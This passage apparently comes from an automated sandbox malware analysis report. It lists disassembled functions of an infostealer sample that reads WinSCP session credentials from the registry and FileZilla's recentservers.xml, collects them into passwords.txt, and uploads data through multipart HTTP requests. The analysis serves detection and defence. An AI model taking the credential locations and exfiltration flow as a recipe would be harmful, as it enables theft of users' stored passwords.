                                                                                                                                                                                                                                                    • Instruction ID: f9cf58ac8806fb8c29bb01b18208c616fc0e040653f854addec4e11ecea806dc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 953c69991870206c77da6e2faa755a67d13f47f573c48f6a2580bfbba979c913
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D6201BDA10620EFE754DFA5ED98E2637BBF74AB017106529EA05C3364E734A841CF60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C30B
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C32A
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C342
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C35A
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C36D
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C37B
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C38C
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,0040EAF6), ref: 0040C3AE
                                                                                                                                                                                                                                                    • RegGetValueA.ADVAPI32(0040EAF6,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040C3EF
                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,0040EAF6), ref: 0040C427
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memset$Open$Value
                                                                                                                                                                                                                                                    • String ID: :22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                                                    • API String ID: 2608732736-1250616252
                                                                                                                                                                                                                                                    • Opcode ID: 84f0a8c8484ba34b70e54d8db9e4517a8c939116ec80965e7da635ccf1c304d2
                                                                                                                                                                                                                                                    • Instruction ID: cbda87958c2d1559049c9a5e39ac49dd90b106e9b4a90716c584001952143c95
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84f0a8c8484ba34b70e54d8db9e4517a8c939116ec80965e7da635ccf1c304d2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AED18EB1A0022AEFDB10EBE4CD85EFF777DEB58704F10456AF505B3280D6785A488B65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 89 40c770-40c842 call 40fcd0 call 411530 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fd10 call 406d60 112 40c848-40c85a call 411590 89->112 113 40cc7a-40ccbf call 40fd50 * 4 89->113 112->113 119 40c860-40c8d1 strtok_s call 40fcd0 * 4 GetProcessHeap HeapAlloc 112->119 133 40c8d7 119->133 134 40cbcd-40cc75 lstrlenA call 40fcd0 call 401060 call 415250 call 40fd50 memset call 40ff20 * 4 call 40fd50 * 4 119->134 135 40c8e0-40c8ee StrStrA 133->135 134->113 137 40c8f0-40c91d lstrlenA call 411a10 call 40fdb0 call 40fd50 135->137 138 40c922-40c930 StrStrA 135->138 137->138 141 40c932-40c965 lstrlenA call 411a10 call 40fdb0 call 40fd50 138->141 142 40c96a-40c978 StrStrA 138->142 141->142 144 40c9b2-40c9c0 StrStrA 142->144 145 40c97a-40c9ad lstrlenA call 411a10 call 40fdb0 call 40fd50 142->145 152 40c9c6-40ca13 lstrlenA call 411a10 call 40fdb0 call 40fd50 call 40ff70 call 406e30 144->152 153 40ca4a-40ca5c call 40ff70 lstrlenA 144->153 145->144 152->153 195 40ca15-40ca45 call 40fd60 call 40fe90 call 40fdb0 call 40fd50 152->195 167 40cbb1-40cbc7 strtok_s 153->167 168 40ca62-40ca74 call 40ff70 lstrlenA 153->168 167->134 167->135 168->167 181 40ca7a-40ca8c call 40ff70 lstrlenA 168->181 181->167 190 40ca92-40caa4 call 40ff70 lstrlenA 181->190 190->167 199 40caaa-40cbac lstrcat * 2 call 40ff70 lstrcat * 2 call 40ff70 lstrcat * 3 call 40ff70 lstrcat * 3 call 40ff70 lstrcat * 3 call 40fd60 * 4 190->199 195->153 199->167
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 00411530: SHGetFolderPathA.SHELL32(00000000,^iB,00000000,00000000,?,00000000), ref: 00411568
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                                      • Part of subcall function 00411590: LocalAlloc.KERNEL32(00000040,00413AC1,?,00000001,00000004,?,00413AC0,00000000,00000000), ref: 004115AC
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 0040C869
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00426966,00426963,00426962,0042695F), ref: 0040C8BF
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C8C6
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040C8E6
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C8F1
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: malloc.MSVCRT ref: 00411A21
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: strncpy.MSVCRT ref: 00411A31
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040C928
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C933
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 0040C970
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C97B
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040C9B8
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9C7
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA53
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA6B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA83
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA9B
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Soft: FileZilla), ref: 0040CAB3
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Host: ), ref: 0040CAC2
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CAD5
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D38), ref: 0040CAE4
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CAF7
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D3C), ref: 0040CB06
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Login: ), ref: 0040CB15
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CB28
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D48), ref: 0040CB37
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,Password: ), ref: 0040CB46
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00000000), ref: 0040CB59
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D58), ref: 0040CB68
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00417CD9,00426D5C), ref: 0040CB77
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrlenA.KERNEL32(004181A9,?,00000000,?,0041790D,004271B2,004271AF,00000000,?,00000000,004228A8,000000FF,?,004181A9), ref: 0040FD6B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrcpy.KERNEL32(00000000,004181A9), ref: 0040FDA2
                                                                                                                                                                                                                                                    • strtok_s.MSVCRT ref: 0040CBBB
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00417CD9,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBD1
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040CC22
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$niBkiBjiB$passwords.txt
                                                                                                                                                                                                                                                    • API String ID: 433178851-3004004793
                                                                                                                                                                                                                                                    • Opcode ID: 1373f8e8692b112c6ea9e6b1d99b5f9c17d77ad09afe90e3f6a463c4a80c99c6
                                                                                                                                                                                                                                                    • Instruction ID: b57454810d6304676497751934f7ea3bd1d565fdd6c3d061aa416f4a09d76235
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1373f8e8692b112c6ea9e6b1d99b5f9c17d77ad09afe90e3f6a463c4a80c99c6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 93E18C75900218AACB14EBE4DD4AFEEBB78AF15704F50447EF502731D2DF786A08CA69
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 228 404d60-404e79 call 40fd10 call 404350 call 4115e0 call 40ff70 lstrlenA call 40ff70 call 4115e0 call 40fcd0 * 5 StrCmpCA 251 404e82-404e87 228->251 252 404e7b 228->252 253 4056ba-4056f9 call 411240 * 2 call 40ff20 * 4 call 40fd10 251->253 254 404e8d-404fb4 call 411310 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fe00 call 40fe90 call 40fdb0 call 40fd50 * 3 call 40fe90 call 40fe00 call 40fdb0 call 40fd50 * 2 InternetConnectA 251->254 252->251 282 4056fe-405783 call 40fd50 * 9 253->282 254->253 321 404fba-404ff2 HttpOpenRequestA 254->321 322 4056b3-4056b4 InternetCloseHandle 321->322 323 404ff8-404ffc 321->323 322->253 324 405014-405609 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 402360 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 
40fdb0 call 40fd50 call 40ff70 lstrlenA call 40ff70 lstrlenA GetProcessHeap HeapAlloc call 40ff70 lstrlenA call 40ff70 memcpy call 40ff70 lstrlenA memcpy call 40ff70 lstrlenA call 40ff70 * 2 lstrlenA memcpy call 40ff70 lstrlenA call 40ff70 HttpSendRequestA call 411240 HttpQueryInfoA 323->324 325 404ffe-40500e InternetSetOptionA 323->325 532 40560b-40561a call 40fcd0 324->532 533 40561f-405633 call 411210 324->533 325->324 532->282 538 405784-405793 call 40fcd0 533->538 539 405639-405652 InternetReadFile 533->539 538->282 541 405654-405659 539->541 542 4056a9-4056b0 InternetCloseHandle 539->542 541->542 543 40565b-4056a7 call 40fe90 call 40fdb0 call 40fd50 InternetReadFile 541->543 542->322 543->541 543->542
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404DE6
                                                                                                                                                                                                                                                      • Part of subcall function 004115E0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411604
                                                                                                                                                                                                                                                      • Part of subcall function 004115E0: GetProcessHeap.KERNEL32(00000000,?,?,00404DDA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00411613
                                                                                                                                                                                                                                                      • Part of subcall function 004115E0: HeapAlloc.KERNEL32(00000000,?,?,00404DDA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041161A
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,015CF600,004266CF,004266CB,004266C3,004266BF,004266BE), ref: 00404E71
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FA7
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,015CF640,?,015D2480,00000000,00000000,-00400100,00000000), ref: 00404FE8
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040500E
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,015CF080,00000000,?,00426788,00000000,?,?), ref: 00405506
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00405518
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040552B
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00405532
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00405544
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00405558
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?), ref: 00405571
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040557B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040558C
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004055A5
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004055B2
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000), ref: 004055C8
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004055D9
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405601
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 0040564A
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 0040569F
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004056AA
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004056B4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen$Internet$lstrcpy$Heap$Httpmemcpy$AllocCloseFileHandleProcessReadRequestlstrcat$BinaryConnectCrackCryptInfoOpenOptionQuerySendString
                                                                                                                                                                                                                                                    • String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$build_id$file_data
                                                                                                                                                                                                                                                    • API String ID: 1552553701-1805485788
                                                                                                                                                                                                                                                    • Opcode ID: 36288343b13bcecf3f3343ce157e6e3581ff12686f309abd99186f30baf50d53
                                                                                                                                                                                                                                                    • Instruction ID: ab71994ed1295a43bc8c3dd8a783d46a99ab3c159837bd77a07e11315958c144
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36288343b13bcecf3f3343ce157e6e3581ff12686f309abd99186f30baf50d53
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5624E75800248EACB15EBE5C955AEEBBB8AF18704F50407EE502735D2DB386B4CCB79
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    control_flow_graph 565 405bc0-405cb2 call 40fd10 call 404350 call 40fcd0 * 5 call 40ff70 InternetOpenA StrCmpCA 582 405cb4 565->582 583 405cbb-405cbd 565->583 582->583 584 405cc3-405e41 call 411310 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fe00 call 40fdb0 call 40fd50 * 2 InternetConnectA 583->584 585 40639f-4063c0 InternetCloseHandle call 40ff70 call 406e30 583->585 669 405e47-405e7f HttpOpenRequestA 584->669 670 40639c 584->670 595 4063c2-4063ef call 40fd60 call 40fe90 call 40fdb0 call 40fd50 585->595 596 4063f4-40647c call 411240 * 2 call 40fd50 * 8 585->596 595->596 671 406395-406396 InternetCloseHandle 669->671 672 405e85-405e89 669->672 670->585 671->670 673 405ea1-406330 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 402360 call 40fe00 call 40fdb0 call 40fd50 * 2 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe90 call 40fdb0 call 40fd50 call 40fe00 call 40fdb0 call 40fd50 call 40ff70 lstrlenA call 
40ff70 lstrlenA GetProcessHeap HeapAlloc call 40ff70 lstrlenA call 40ff70 memcpy call 40ff70 lstrlenA call 40ff70 * 2 lstrlenA memcpy call 40ff70 lstrlenA call 40ff70 HttpSendRequestA InternetReadFile 672->673 674 405e8b-405e9b InternetSetOptionA 672->674 835 406332-406337 673->835 836 406388-406392 InternetCloseHandle 673->836 674->673 835->836 837 406339-406386 call 40fe90 call 40fdb0 call 40fd50 InternetReadFile 835->837 836->671 837->835 837->836
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C8A
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405E34
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,015CF640,?,015D2480,00000000,00000000,-00400100,00000000), ref: 00405E74
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,0041FDD1,?,00000000,0041FDD1,",00000000,0041FDD1,mode,00000000,0041FDD1,015CF080,00000000,0041FDD1,00426808), ref: 00406272
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406283
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040628E
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406295
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004062A6
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004062B7
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062C8
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062E1
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004062EA
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004062FD
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(?,00000000,00000000), ref: 00406311
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,000000C7,00000000), ref: 00406328
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,00000000,000000C7,00000000), ref: 0040637E
